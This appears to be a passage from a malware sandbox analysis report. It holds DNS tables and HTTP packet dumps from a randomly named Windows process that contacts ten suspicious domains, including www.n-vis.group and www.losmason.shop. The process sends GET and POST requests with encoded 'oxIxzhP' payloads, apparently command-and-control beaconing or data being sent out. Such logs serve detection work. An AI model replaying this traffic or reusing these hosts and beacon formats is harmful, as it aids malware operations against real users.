DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 07:59:01.364593029 CET	192.168.2.5	1.1.1.1	0x8227	Standard query (0)	www.n-vis.group	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:17.571574926 CET	192.168.2.5	1.1.1.1	0x99a7	Standard query (0)	www.losmason.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:30.888005972 CET	192.168.2.5	1.1.1.1	0xa56d	Standard query (0)	www.dialagiaja18.buzz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:44.181915045 CET	192.168.2.5	1.1.1.1	0x23f	Standard query (0)	www.395608.men	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:58.510548115 CET	192.168.2.5	1.1.1.1	0x9ef1	Standard query (0)	www.gkfundeis.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:12.259572983 CET	192.168.2.5	1.1.1.1	0x1f7e	Standard query (0)	www.incgruporxat.click	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:25.541977882 CET	192.168.2.5	1.1.1.1	0x12e6	Standard query (0)	www.holytur.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:39.150003910 CET	192.168.2.5	1.1.1.1	0x7cdc	Standard query (0)	www.lirio.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:52.290626049 CET	192.168.2.5	1.1.1.1	0xf1f4	Standard query (0)	www.espiritismo.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:01:06.712410927 CET	192.168.2.5	1.1.1.1	0xe716	Standard query (0)	www.mindfulsteps.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 07:59:01.600001097 CET	1.1.1.1	192.168.2.5	0x8227	No error (0)	www.n-vis.group		90.156.201.74	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:01.600001097 CET	1.1.1.1	192.168.2.5	0x8227	No error (0)	www.n-vis.group		90.156.201.66	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:01.600001097 CET	1.1.1.1	192.168.2.5	0x8227	No error (0)	www.n-vis.group		90.156.201.18	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:01.600001097 CET	1.1.1.1	192.168.2.5	0x8227	No error (0)	www.n-vis.group		90.156.201.112	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:17.592466116 CET	1.1.1.1	192.168.2.5	0x99a7	No error (0)	www.losmason.shop		104.18.73.116	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:30.922322989 CET	1.1.1.1	192.168.2.5	0xa56d	No error (0)	www.dialagiaja18.buzz	dialagiaja18.buzz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:30.922322989 CET	1.1.1.1	192.168.2.5	0xa56d	No error (0)	dialagiaja18.buzz		66.29.148.78	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:44.686825037 CET	1.1.1.1	192.168.2.5	0x23f	No error (0)	www.395608.men	lc7.cdnlaochen.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:44.686825037 CET	1.1.1.1	192.168.2.5	0x23f	No error (0)	lc7.cdnlaochen.com	rexw2u6y-u.fly8899.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:44.686825037 CET	1.1.1.1	192.168.2.5	0x23f	No error (0)	rexw2u6y-u.fly8899.com	5w23j7d4.n.fly8899.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:44.686825037 CET	1.1.1.1	192.168.2.5	0x23f	No error (0)	5w23j7d4.n.fly8899.com		207.148.38.19	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:44.686825037 CET	1.1.1.1	192.168.2.5	0x23f	No error (0)	5w23j7d4.n.fly8899.com		66.203.149.226	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:44.686825037 CET	1.1.1.1	192.168.2.5	0x23f	No error (0)	5w23j7d4.n.fly8899.com		118.107.44.244	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:58.548343897 CET	1.1.1.1	192.168.2.5	0x9ef1	No error (0)	www.gkfundeis.net		62.116.130.8	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:12.272286892 CET	1.1.1.1	192.168.2.5	0x1f7e	No error (0)	www.incgruporxat.click		104.21.88.139	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:12.272286892 CET	1.1.1.1	192.168.2.5	0x1f7e	No error (0)	www.incgruporxat.click		172.67.180.24	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:25.737780094 CET	1.1.1.1	192.168.2.5	0x12e6	No error (0)	www.holytur.net	holytur.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 08:00:25.737780094 CET	1.1.1.1	192.168.2.5	0x12e6	No error (0)	holytur.net		185.106.208.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:39.162276030 CET	1.1.1.1	192.168.2.5	0x7cdc	No error (0)	www.lirio.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:39.162276030 CET	1.1.1.1	192.168.2.5	0x7cdc	No error (0)	www.lirio.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:52.313600063 CET	1.1.1.1	192.168.2.5	0xf1f4	No error (0)	www.espiritismo.info	espiritismo.info		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 08:00:52.313600063 CET	1.1.1.1	192.168.2.5	0xf1f4	No error (0)	espiritismo.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:00:52.313600063 CET	1.1.1.1	192.168.2.5	0xf1f4	No error (0)	espiritismo.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:01:06.723833084 CET	1.1.1.1	192.168.2.5	0xe716	No error (0)	www.mindfulsteps.xyz		199.192.23.123	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.n-vis.group

www.losmason.shop

www.dialagiaja18.buzz

www.395608.men

www.gkfundeis.net

www.incgruporxat.click

www.holytur.net

www.lirio.shop

www.espiritismo.info

www.mindfulsteps.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49969	90.156.201.74	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:01.621920109 CET	448	OUT	GET /lqir/?oxIxzhP=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCwfZdncWlSOnlraFB/QZ6SGlkqJPU2RhLExK1aNqo6ZD2rg==&qHO8p=hd0DQ8 HTTP/1.1 Host: www.n-vis.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 07:59:02.363516092 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: Apache Cache-Control: max-age=0 Expires: Sat, 11 Jan 2025 06:59:02 GMT Data Raw: 31 66 32 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 65 2c 74 2c 72 2c 69 2c 6b 2c 61 29 7b 6d 5b 69 5d 3d 6d 5b 69 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6d 5b 69 5d 2e 61 3d 6d 5b 69 5d 2e 61 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 0a 20 20 20 6d 5b 69 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 0a 20 20 20 66 6f 72 20 28 76 61 72 20 6a 20 3d 20 30 3b 20 6a 20 3c 20 64 6f 63 75 6d 65 6e 74 2e 73 63 72 69 70 74 73 2e 6c 65 6e 67 74 68 3b 20 6a 2b 2b 29 20 7b 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 73 63 72 69 70 74 73 5b 6a 5d 2e 73 72 63 20 3d 3d 3d 20 72 29 20 7b 20 72 65 74 75 72 6e 3b 20 7d 7d 0a 20 20 20 6b 3d 65 2e 63 72 65 61 74 [TRUNCATED] Data Ascii: 1f2c<!doctype html><html lang="ru"><head>... Yandex.Metrika counter --><script type="text/javascript" > (function(m,e,t,r,i,k,a){m[i]=m[i]\|\|function(){(m[i].a=m[i].a\|\|[]).push(arguments)}; m[i].l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (document.scripts[j].src === r) { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(97952577, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div><img src="https://mc.yandex.ru/watch/97952577" style="position:absolute; left:-9999px;" alt="" /></div></noscript>... /Yandex.Metrika counter --> <meta charset="UTF-8"> <title> </title> <meta name="description" content="
Jan 11, 2025 07:59:02.363537073 CET	1236	IN	Data Raw: d0 b2 d1 80 d0 b5 d0 bc d1 8f 20 d0 bf d0 be d1 81 d0 bc d0 be d1 82 d1 80 d0 b5 d1 82 d1 8c 20 d0 bd d0 b0 20 d1 80 d0 b5 d0 ba d0 bb d0 b0 d0 bc d1 83 20 d0 9f d0 9e 2d d0 9d d0 9e d0 92 d0 9e d0 9c d0 a3 21 20 d0 9f d1 80 d0 be d0 b4 d1 8e d1 Data Ascii: -! !"> <link rel="shortcut icon" href="/landing/i
Jan 11, 2025 07:59:02.363552094 CET	1236	IN	Data Raw: d0 bb d0 b8 d1 87 d0 b8 d1 8f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 72 74 6e 65 72 73 22 3e d0 9f d0 b0 d1 80 d1 82 d0 bd d0 b5 d1 80 d1 8b 3c 2f 61 3e 3c 2f Data Ascii: </a></li> <li><a href="#partners"></a></li> <li><a href="#clients"></a></li> <li><a href="#contacts"></a></li> </ul>
Jan 11, 2025 07:59:02.363564968 CET	1236	IN	Data Raw: d1 82 d1 80 d0 b8 d0 bc 20 d0 bd d0 b0 20 d1 80 d0 b5 d0 ba d0 bb d0 b0 d0 bc d1 83 20 d0 bf d0 be 2d d0 bd d0 be d0 b2 d0 be d0 bc d1 83 3f 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: -? </p> </div> <button class="hero__down"> <svg xmlns="http://www.w3.org/2000/svg" width="56" height="56" viewbox="0 0 56 56" fill="none"> <path
Jan 11, 2025 07:59:02.363579035 CET	896	IN	Data Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e d0 9d d0 b0 d1 81 d1 82 d0 b0 d0 bb d0 be 20 d0 b2 d1 80 d0 b5 d0 bc d1 8f 20 d0 bf d0 be d1 81 d0 bc d0 be d1 82 d1 80 d0 b5 d1 82 d1 8c 20 3c 62 72 3e 20 d0 bd d0 b0 20 d1 80 d0 b5 d0 ba Data Ascii: "> <h2> <br> <br> -!</h2> <div class="features__items"> <div class="features__item"> <img src="/landing/img
Jan 11, 2025 07:59:02.363601923 CET	1236	IN	Data Raw: 74 65 6d 2d 6e 61 6d 65 22 3e d0 92 d0 bd d0 b5 20 d0 ba d0 be d0 bd d0 ba d1 83 d1 80 d0 b5 d0 bd d1 86 d0 b8 d0 b8 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 65 61 74 75 72 65 73 5f 5f 69 Data Ascii: tem-name"> </p> <p class="features__item-descr"> </p> </div> <div class="features__item"> <img src="/landing/img/i
Jan 11, 2025 07:59:02.363615990 CET	1236	IN	Data Raw: d1 80 d0 b8 d0 b0 d0 bb d1 8b 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 44 69 67 69 74 61 6c 2d d0 be d0 bf d1 86 d0 b8 d0 b8 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c Data Ascii: </li> <li>Digital-</li> </ul> </div> <div class="producing__item"> <p class="producing__item-name"></p> <im
Jan 11, 2025 07:59:02.363630056 CET	1236	IN	Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 4e 56 69 73 73 69 6f 6e 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 3e d0 90 d0 Data Ascii: </div> <a href="https://t.me/NVission" target="_blank" class="btn"> <br> </a> </div> </section> <section class="effect" id="effect"> <div class="
Jan 11, 2025 07:59:02.363643885 CET	1236	IN	Data Raw: 37 2e 35 20 34 2e 39 36 38 37 35 20 31 35 2e 39 30 36 32 20 34 2e 33 31 32 35 20 31 34 20 34 2e 32 35 43 31 32 2e 30 39 33 38 20 34 2e 33 31 32 35 20 31 30 2e 35 20 34 2e 39 36 38 37 35 20 39 2e 32 31 38 37 35 20 36 2e 32 31 38 37 35 43 37 2e 39 Data Ascii: 7.5 4.96875 15.9062 4.3125 14 4.25C12.0938 4.3125 10.5 4.96875 9.21875 6.21875C7.96875 7.5 7.3125 9.09375 7.25 11C7.3125 12.9062 7.96875 14.5 9.21875 15.7812C10.5 17.0312 12.0938 17.6875 14 17.75C15.9062 17.6875 17.5 17.0312 18.7812 15.7812C20
Jan 11, 2025 07:59:02.363656998 CET	1236	IN	Data Raw: 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 76 69 65 77 62 6f 78 3d 22 30 20 30 20 32 38 20 32 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 Data Ascii: width="28" height="22" viewbox="0 0 28 22" fill="none"> <path d="M27.3594 10.1562C27.4531 10.4375 27.5 10.7188 27.5 11C27.5 11.25 27.4531 11.5312 27.3594 11.8438C26.0469 14.75 24.2188 17.0781 21.875 18.8281C19.5312 20.5781
Jan 11, 2025 07:59:02.368688107 CET	1236	IN	Data Raw: 2e 37 39 36 39 20 39 2e 35 20 31 30 2e 36 37 31 39 43 39 2e 35 33 31 32 35 20 31 30 2e 36 34 30 36 20 39 2e 35 34 36 38 38 20 31 30 2e 36 32 35 20 39 2e 35 34 36 38 38 20 31 30 2e 36 32 35 43 39 2e 39 35 33 31 32 20 31 30 2e 38 37 35 20 31 30 2e Data Ascii: .7969 9.5 10.6719C9.53125 10.6406 9.54688 10.625 9.54688 10.625C9.95312 10.875 10.4375 11 11 11C11.8438 10.9688 12.5469 10.6719 13.1094 10.1094C13.6719 9.54688 13.9688 8.84375 14 8C14 7.46875 13.875 6.98438 13.625 6.54688C13.75 6.51562 13.875

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49979	104.18.73.116	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:17.612359047 CET	712	OUT	POST /uktz/ HTTP/1.1 Host: www.losmason.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.losmason.shop Referer: http://www.losmason.shop/uktz/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 75 50 47 30 48 47 32 56 76 2b 44 65 62 50 6c 79 44 62 58 39 52 66 43 70 73 46 4d 6d 77 32 74 34 79 6e 46 6c 44 7a 51 55 4f 70 42 73 45 68 50 6d 6b 42 56 4e 64 4a 66 67 43 4c 68 65 69 53 7a 6c 43 33 47 6b 4d 4d 70 4b 78 67 51 50 71 4d 75 6f 50 50 77 4b 76 31 68 46 2b 50 5a 41 4f 44 4f 66 51 72 57 62 76 5a 36 4c 48 52 56 44 41 53 78 71 47 52 4e 73 46 36 4d 42 67 55 45 72 7a 50 70 37 50 38 64 47 46 56 49 43 52 58 63 7a 72 36 43 64 62 65 49 55 6b 4f 41 73 36 33 76 73 65 5a 4c 34 58 76 4b 58 45 4c 49 33 7a 71 43 62 50 4d 45 62 73 63 43 73 2b 78 6f 45 2b 49 65 34 56 70 30 2f 79 56 45 55 38 4e 41 3d Data Ascii: oxIxzhP=uPG0HG2Vv+DebPlyDbX9RfCpsFMmw2t4ynFlDzQUOpBsEhPmkBVNdJfgCLheiSzlC3GkMMpKxgQPqMuoPPwKv1hF+PZAODOfQrWbvZ6LHRVDASxqGRNsF6MBgUErzPp7P8dGFVICRXczr6CdbeIUkOAs63vseZL4XvKXELI3zqCbPMEbscCs+xoE+Ie4Vp0/yVEU8NA=
Jan 11, 2025 07:59:18.075660944 CET	1236	IN	HTTP/1.1 409 Conflict Date: Sat, 11 Jan 2025 06:59:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6119 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 900305f5a8760f79-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error \| www.losmason.shop \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&
Jan 11, 2025 07:59:18.075676918 CET	1236	IN	Data Raw: 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75 Data Ascii: JSON.stringify){var e=function(a){var c=document.getElementById("error-feedback-survey"),d=document.getElementById("error-feedback-success"),b=new XMLHttpRequest;a={event:"feedback clicked",properties:{errorCode:1001,helpful:a,version:1}};b.op
Jan 11, 2025 07:59:18.075687885 CET	1236	IN	Data Raw: 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 69 6e 6c 69 Data Ascii: pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span> <sp
Jan 11, 2025 07:59:18.075699091 CET	1236	IN	Data Raw: 65 6e 74 69 61 6c 20 63 61 75 73 65 73 20 6f 66 20 74 68 69 73 3a 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6c 2d 31 30 20 6d 74 2d 36 20 74 65 78 74 2d 31 35 20 74 65 78 74 2d 62 6c 61 63 6b 2d 64 61 Data Ascii: ential causes of this:</p> <ul class="ml-10 mt-6 text-15 text-black-dark antialiased leading-normal"> <li class="mb-4"><strong class="font-semibold">Most likely:</strong> if the owner just signed up for Cloudflare it
Jan 11, 2025 07:59:18.075711012 CET	1236	IN	Data Raw: 20 54 68 61 6e 6b 20 79 6f 75 20 66 6f 72 20 79 6f 75 72 20 66 65 65 64 62 61 63 6b 21 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 Data Ascii: Thank you for your feedback! </div></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <s
Jan 11, 2025 07:59:18.075721979 CET	353	IN	Data Raw: 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 61 Data Ascii: st.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div>... /#cf-error-details

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49980	104.18.73.116	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:20.347218037 CET	732	OUT	POST /uktz/ HTTP/1.1 Host: www.losmason.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.losmason.shop Referer: http://www.losmason.shop/uktz/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 75 50 47 30 48 47 32 56 76 2b 44 65 5a 76 31 79 45 38 6a 39 64 76 43 71 67 6c 4d 6d 72 6d 74 38 79 6e 5a 6c 44 32 67 45 4a 62 31 73 45 45 7a 6d 6e 41 56 4e 51 70 66 67 61 37 68 48 2f 69 79 6e 43 33 4b 47 4d 49 68 4b 78 67 45 50 71 4d 65 6f 4d 35 34 4e 76 6c 68 48 34 50 5a 43 42 6a 4f 66 51 72 57 62 76 64 61 68 48 52 4e 44 41 44 42 71 48 7a 6c 76 62 4b 4d 43 6e 55 45 72 35 76 70 6e 50 38 64 42 46 58 38 37 52 56 30 7a 72 37 53 64 62 50 49 56 39 65 41 75 33 58 75 48 50 35 69 43 57 63 4b 6c 49 5a 35 56 7a 74 6d 2f 48 61 31 78 32 2b 4b 45 74 52 45 38 75 62 57 50 45 5a 56 57 6f 32 55 6b 69 61 58 6c 54 66 6d 4c 6c 78 69 61 4f 5a 4d 45 58 35 62 2f 4b 4d 36 51 Data Ascii: oxIxzhP=uPG0HG2Vv+DeZv1yE8j9dvCqglMmrmt8ynZlD2gEJb1sEEzmnAVNQpfga7hH/iynC3KGMIhKxgEPqMeoM54NvlhH4PZCBjOfQrWbvdahHRNDADBqHzlvbKMCnUEr5vpnP8dBFX87RV0zr7SdbPIV9eAu3XuHP5iCWcKlIZ5Vztm/Ha1x2+KEtRE8ubWPEZVWo2UkiaXlTfmLlxiaOZMEX5b/KM6Q
Jan 11, 2025 07:59:20.786860943 CET	1236	IN	HTTP/1.1 409 Conflict Date: Sat, 11 Jan 2025 06:59:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6119 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 900306068d0243fe-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error \| www.losmason.shop 